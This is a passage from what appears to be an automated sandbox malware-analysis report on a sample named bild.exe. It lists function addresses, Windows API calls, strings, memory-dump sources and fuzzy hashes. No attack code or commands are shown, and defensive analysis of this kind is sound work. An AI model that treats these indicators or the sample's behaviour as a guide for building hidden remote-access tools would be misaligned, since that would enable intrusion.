                                                                                      • Instruction ID: 1c2cd706bfc580d94f6c8d94d17799be7df3d247d13d912ddb644fcd1bc25a9e
                                                                                      • Opcode Fuzzy Hash: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
                                                                                      • Instruction Fuzzy Hash: FC310575A04B059FD315CF69C884B9AFBE4FB4C314F10866EE85AC7750EB34A854CB90
                                                                                      Function 110B3340 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(0000002C,4012B9B4,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,4012B9B4,?,?,00000000), ref: 110B336F
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,4012B9B4,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                      • SetEvent.KERNEL32(?,?,?,1103D571,?,4012B9B4,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,4012B9B4,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                      • String ID:
                                                                                      • API String ID: 3394196147-0
                                                                                      • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                      • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                      • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                      • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                      Function 11113240 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 11113252
                                                                                      • SetCursor.USER32(00000000,?,?,11120606,00000000,00000000,11124B99,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004), ref: 11113259
                                                                                      • DestroyCursor.USER32(?), ref: 11113270
                                                                                      • DestroyCursor.USER32(?), ref: 1111327D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Cursor$Destroy$Load
                                                                                      • String ID:
                                                                                      • API String ID: 3167891023-0
                                                                                      • Opcode ID: cf8b1945f01808845252a66b1172c4e509a608c0218fa3bfec4bfdca6e73ac18
                                                                                      • Instruction ID: a2e30b34d5d2f1c91a37dce4984a5637c3bf472293567a6a29e36ae9608199f7
                                                                                      • Opcode Fuzzy Hash: cf8b1945f01808845252a66b1172c4e509a608c0218fa3bfec4bfdca6e73ac18
                                                                                      • Instruction Fuzzy Hash: 5EE09B7091CB009BDB019B798CCC957F7E8BBD4711B20093DE17EC210CC735A4418B10
                                                                                      Function 110071A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                      • SetFocus.USER32(?), ref: 11007353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                      • String ID: edit
                                                                                      • API String ID: 1305092643-2167791130
                                                                                      • Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                      • Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
                                                                                      • Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                      • Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61
                                                                                      Function 110091F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                      • _memmove.LIBCMT ref: 110092B6
                                                                                        • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                      • String ID: string too long
                                                                                      • API String ID: 2168136238-2556327735
                                                                                      • Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                      • Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
                                                                                      • Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                      • Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1
                                                                                      Function 1108F2F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • std::exception::exception.LIBCMT ref: 1108F38C
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1108F3A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID: L
                                                                                      • API String ID: 1338273076-2909332022
                                                                                      • Opcode ID: 3896e810ab9ec8afa04ae16f69e355a36910fef65e5343e495f94c92c586995c
                                                                                      • Instruction ID: a4fae97c5fdb08f5bbe7be2be84186cb3cec15bbd065a55e87689edd9833ea14
                                                                                      • Opcode Fuzzy Hash: 3896e810ab9ec8afa04ae16f69e355a36910fef65e5343e495f94c92c586995c
                                                                                      • Instruction Fuzzy Hash: E73177B5D04259AFDB10DFA5C880BDEFBF8FB08754F04826DE915A7280D775A904CB51
                                                                                      Function 11041350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 11041413
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                      Strings
                                                                                      • VolumeControl exception : %hs, xrefs: 11041431
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                      • String ID: VolumeControl exception : %hs
                                                                                      • API String ID: 3728558374-910296547
                                                                                      • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                      • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                      • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                      • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                      Function 1100F260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 1100F27B
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                        • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 1100F292
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                      • String ID: string too long
                                                                                      • API String ID: 963545896-2556327735
                                                                                      • Opcode ID: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                      • Instruction ID: bb54faa7590d99a912cddc2b6cd1eeb78aa94a45d21c5f83dac251cd0972bc34
                                                                                      • Opcode Fuzzy Hash: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                      • Instruction Fuzzy Hash: EE119A377046544FE321D99CE880B6AF7E9EF956A4F20066FE59187650C7A1A84483A2
                                                                                      Function 110B9280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(8D111939,00000009,?,?,?,?,?,?,?,?,?,?,110BA3E6,110BFEBC), ref: 110B92CB
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004C), ref: 110B8642
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004D), ref: 110B8649
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004E), ref: 110B8650
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004F), ref: 110B8657
                                                                                        • Part of subcall function 110B8610: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8666
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(?), ref: 110B8674
                                                                                        • Part of subcall function 110B8610: GetSystemMetrics.USER32(00000001), ref: 110B8683
                                                                                      • MoveWindow.USER32(8D111939,?,?,?,?,00000001), ref: 110B92F3
                                                                                      Strings
                                                                                      • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B930D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                      • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                      • API String ID: 2940908497-693965840
                                                                                      • Opcode ID: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                      • Instruction ID: ea8a17caf2cab53e8fa0eb5ee6ebbdabb1f0cf5c0d35e4c5ce58ed4944f537fe
                                                                                      • Opcode Fuzzy Hash: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                      • Instruction Fuzzy Hash: FF21EA75B0060AAFDB08DFA8C995DBEF7B5FB88304F104668E51997354DA30BD01CBA4
                                                                                      Function 111471A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      • _memmove.LIBCMT ref: 11147211
                                                                                      Strings
                                                                                      • Failed to get callstack, xrefs: 111471BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentFileModuleNameProcess_memmove
                                                                                      • String ID: Failed to get callstack
                                                                                      • API String ID: 4135527288-766476014
                                                                                      • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                      • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                      • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                      • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
                                                                                      Function 110ED250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExA.ADVAPI32(00020019,?,00000000,4012B9B4,00000000,00020019,?,00000000), ref: 110ED280
                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: QueryValuewvsprintf
                                                                                      • String ID: ($Error %d getting %s
                                                                                      • API String ID: 141982866-3697087921
                                                                                      • Opcode ID: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
                                                                                      • Instruction ID: 38ad67af7cf9c35c8db4f97e6700948d2d14c8bc089a0f5a48db9c7a16624884
                                                                                      • Opcode Fuzzy Hash: ef2d7f3509dbd67b9f71e6e81423e7131c7de3edf52ba7e7570321b23b06e68c
